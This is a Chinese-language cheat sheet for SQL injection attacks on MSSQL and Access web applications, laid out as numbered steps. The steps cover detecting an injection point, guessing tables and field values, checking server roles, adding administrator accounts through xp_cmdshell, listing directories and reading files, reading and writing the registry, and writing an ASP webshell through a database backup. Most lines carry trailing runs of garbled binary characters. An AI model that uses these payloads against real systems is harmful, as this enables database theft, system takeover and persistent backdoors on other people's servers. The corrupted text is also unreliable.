1.判断是否有注入;and 1=1 ;and 1=2 1X�k{(G<�\
2.初步判断是否是mssql ;and user>0 "t��3uW6&
y\r^�\ S9%
3.注入参数是字符'and [查询条件] and ''=' ^=4I|+P,6.
�Hu�c3|�~9
4.搜索时没过滤参数的'and [查询条件] and '%25'=' "u3�fs���2
�Wc�V\kemf
5.判断数据库系统 wsdB�;
6%$
'7RR2f>�V
;and (select count(*) from sysobjects)>0 mssql -+j9X;��h:
KNO*)\
���
;and (select count(*) from msysobjects)>0 access �op.PS{_t�
��3[00-~&U
'P�mHBQvt&
i{1)=_$Vt`
6.猜数据库 ;and (select Count(*) from [数据库名])>0 8.q13�t�!D
JO<gN=��
[
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 i"2J�5�LLv
V{�a}��#�J
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 z�<3}TD��
B^_$
hJncc
9.(1)猜字段的ascii值(access) �#�O�f��<1
82^�
z�-t{
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 V���)WIfRs
cAsS�N.HFS
(2)猜字段的ascii值(mssql) ^-c�s�i���
5�~ *'��>y
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 "W�,"�qFx�
~8Dd<�4?F]
10.测试权限结构(mssql) �ZPxOds�1m
sTYuwna~
�
WL]�Wu�.k
lyOr�M7Gs�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- fe��d�[^wW
n41\y:CA�o
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �SzgY2+Q�q
L��&�3A�r'
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ���@�����4
�fd,}YA�iX
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �6f�5s�I�g
���=5s~$�C
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- LN�yL>VHkK
Js^r]=�\F'
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- @Z=y'yc'y.
�2\iD;Z#gM
;and 1=(select IS_MEMBER('db_owner'));-- �v�0H>iKh7
^c[CyZ:a
=w�;x�axjL
;|2�;kvf"w
11.添加mssql和系统的帐户 +g���D�)Yd
.x-Z+Rs{�g
;exec master.dbo.sp_addlogin username;-- VW<"��c 5|
;exec master.dbo.sp_password null,username,password;-- NZw[.s>n�
�RL�]lt0O{
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- .@/z-Og�Xg
Vqv2�F @�.
;exec master.dbo.xp_cmdshell 'net user username password DY+8�m8!4H
{ZBb.�$}RC
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- yW6[�Fp�w�
+~��pc%�3*
;exec master.dbo.xp_cmdshell 'net user username password /add';-- !!D:V�`F/d
�61eKGcjs:
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- [jtj~]�&mO
g�^�<q L�|
�k�e�;�*uS
d= T9mj.@�
12.(1)遍历目录 !tFU�9Z��t
V"Y
F��u^L
;create table dirs(paths varchar(100), id int) �\P�����tC
�XR=c�
�8f
;insert dirs exec master.dbo.xp_dirtree 'c:\' E6wST@��r�
C�}DG�'z9
;and (select top 1 paths from dirs)>0 v,x%^g�v�0
�e&��a[k��
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) >a�a�nLL�O
�48�"Y-�TV
!\D]�\|Bo�
[0�,q7�d?"
(2)遍历目录 t2�-zJ�Jf8
�GW��kJ/EX
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- (j"~]�T!)1
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 o4I!VK(C#s
fb=$�<0Ocj
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ��PB��3�!;
��XKPt[$ab
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 A](}"P�i!n
p�6eD�d"Y
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 c��402pj
oe_[h]�Hgl
l�i'��1RKr
0.�+��Z�;j
13.mssql中的存储过程 �DGuUI}|)�
?�PxYS%D_L
xp_regenumvalues 注册表根键, 子键 G�zZ|T7fm�
(S�s77~W7�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �`))�J8�j"
t%YX��-�@
xp_regread 根键,子键,键值名 �Xy8i�e:D
@v-)|8�GdY
;exec xp_regread X=c
,`�&^�
z&yb_�A:>�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 T[$hYe8�%^
�Y|�N �vBr
xp_regwrite 根键,子键, 值名, 值类型, 值 Z-�sN4fr a
�v.�^�
�'x
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 kKk ��|@��
&u�`r�E"�"
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 nR�|L�V'�(
'h�HX"\|RA
xp_regdeletevalue 根键,子键,值名 2Q_�{2(nQb
GHsdLe=t0#
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 !�vo�'8r?&
�][K��8�\�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �&�8�YI)G%
U@t?jTMBkO
VE��YKrZ�A
tS/�AP��SY
14.mssql的backup创建webshell SIBI�h-�L�
[,?A�$Z*Z|
use model f+88R=-u6S
K}*p(1$��u
create table cmd(str image); k-PRV8W��O
�T�+`�GOFx
insert into cmd(str) values (''); O��}iKPY8K
H=�SMDj)s+
backup database model to disk='c:\l.asp'; :x�5o3�xE
�w�TuRo
�J
bF���dg�'_
.+~kJ0�~Y�
15.mssql内置函数 snzH}$Ls�
WMz�|FFKVY
;and (select @@version)>0 获得Windows的版本号 Sw9mrhzJfe
G;#�t6b�k�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa IhKa�s4���
^0?cyv\>LA
;and (select user_name())>0 爆当前系统的连接用户 )^2jsy�
-/
�QR"O)lP�
;and (select db_name())>0 得到当前连接的数据库 n_�N�G~�/x
)�^@V*�$�D
f7AJS��H�e
yW,#&>]# |
16.简洁的webshell gl{P�LLe[}
+�q?0A�^C>
use model Nm �:lC%>X
�2o3k=h�KS
create table cmd(str image); GQAg
e�x)D
�^|12~d_.T
insert into cmd(str) values (''); M]z�N�W{Xt
qf&�{O:,Z�
backup database model to disk='g:\wwwtest\l.asp';
